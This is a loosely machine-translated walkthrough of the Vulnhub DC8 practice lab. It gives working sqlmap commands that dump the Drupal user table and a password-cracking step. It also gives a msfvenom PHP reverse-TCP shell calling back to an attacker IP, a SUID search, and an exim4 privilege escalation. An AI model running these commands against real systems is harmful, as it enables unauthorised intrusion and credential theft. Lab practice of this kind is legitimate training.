当前位置:网站首页>Vulnhub's DC8
Vulnhub's DC8
2022-06-26 21:54:00 【Tianxia (Tianyan Master)】
Dear friends , But look at the master directly
https://blog.csdn.net/weixin_44288604/article/details/122944302
Personal writing is very rough
DC8 Its own difficulty is low , You can easily obtain the target permission , General idea
The host found , Port scanning —— Exploit service vulnerabilities —— Get background permissions —— Upload shell—— Raise the right
The host found , Port scanning , Service detection
Total open 2 Ports ,80 and 22 port ,80 The services with open ports are drupal 7, Open the interface for detection , Here use burpsuit union xray To test
burpsuit Of user option Set your own idle agent in the operation bar , function xray that will do , As shown in the figure below Use here bp Test with your own browser , Then click on the interface , Click on each function node
Click to
http://192.168.43.142/?nid=3
In this interface ,xray The presence of sql Inject , Go straight up sqlmap Two databases were found ,d7db,information_schema, Choose the first one here d7db, View table name
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
Choose from a variety of tables users surface , Direct download
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
Two users were found ,admin and john, But the password is the encrypted data , Try brute force cracking , Make these two ciphertexts into a dictionary , Use john To crack violently , Burst out of it john The password for turtle, Log in backstage , View to upload shell The location of , It is recommended to use Google browser , Don't ask , Ask is to be able to right-click translation In this interface , You can define the interface after entering the form , Here the msf Generate php The Trojan horse bounced , It has been generated , No display
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
Open the file , Copy the file to the location shown above , choice PHP code, And save , Then submit the data in recheck format in the corresponding form , You can accept the session
python Interactive shell, Find yes sudo Permission to execute the file
find / -perm -u=s -type f 2>/dev/null
found exim4 by sudo jurisdiction , View version , Find corresponding expexp Dafa , Download the second one here , Then copy it to the attacker , Use python Turn on http service , The target machine downloads and runs
get root jurisdiction
边栏推荐
猜你喜欢
Yolov6: un cadre de détection de cibles rapide et précis est Open Source
vulnhub之DC9
在Flutter中解析复杂的JSON
AI intelligent matting tool - hair can be seen
ICML2022 | Neurotoxin:联邦学习的持久后门
360 mobile assistant is the first to access the app signature service system to help distribute privacy and security
LabVIEW Arduino tcp/ip remote smart home system (project part-5)
leetcode:710. 黑名单中的随机数【映射思维】
Shiniman household sprint A shares: annual revenue of nearly 1.2 billion red star Macalline and incredibly home are shareholders
CVPR 2022 | 美团技术团队精选论文解读
随机推荐
【图像处理基础】基于matlab GUI图像直方图均衡化系统【含Matlab源码 1924期】
在Flutter中解析复杂的JSON
How to enable Hana cloud service on SAP BTP platform
Configuring assimp Library in QT environment (MinGW compiler)
YuMinHong: New Oriental does not have a reversal of falling and turning over, destroying and rising again
Introduction to operator
协同过滤进化版本NeuralCF及tensorflow2实现
中金证券经理给的开户二维码办理股票开户安全吗?我想开个户
The network connection is disconnected. Please refresh and try again
在哪家券商公司开户最方便最安全可靠
Leetcode(763)——划分字母区间
Android IO, a first-line Internet manufacturer, is a collection of real questions for senior Android interviews
聊聊我的远程工作体验 | 社区征文
y48.第三章 Kubernetes从入门到精通 -- Pod的状态和探针(二一)
花店橱窗布置【动态规划】
Configure redis master-slave and sentinel sentinel in the centos7 environment (solve the problem that the sentinel does not switch when the master hangs up in the ECS)
证券注册开户有没有什么风险?安全吗?
leetcode:6103. 从树中删除边的最小分数【dfs + 联通分量 + 子图的值记录】
这个算BUG吗?乱填的字母是否可以关闭
买股票通过中金证券经理的开户二维码开户资金是否安全?想开户炒股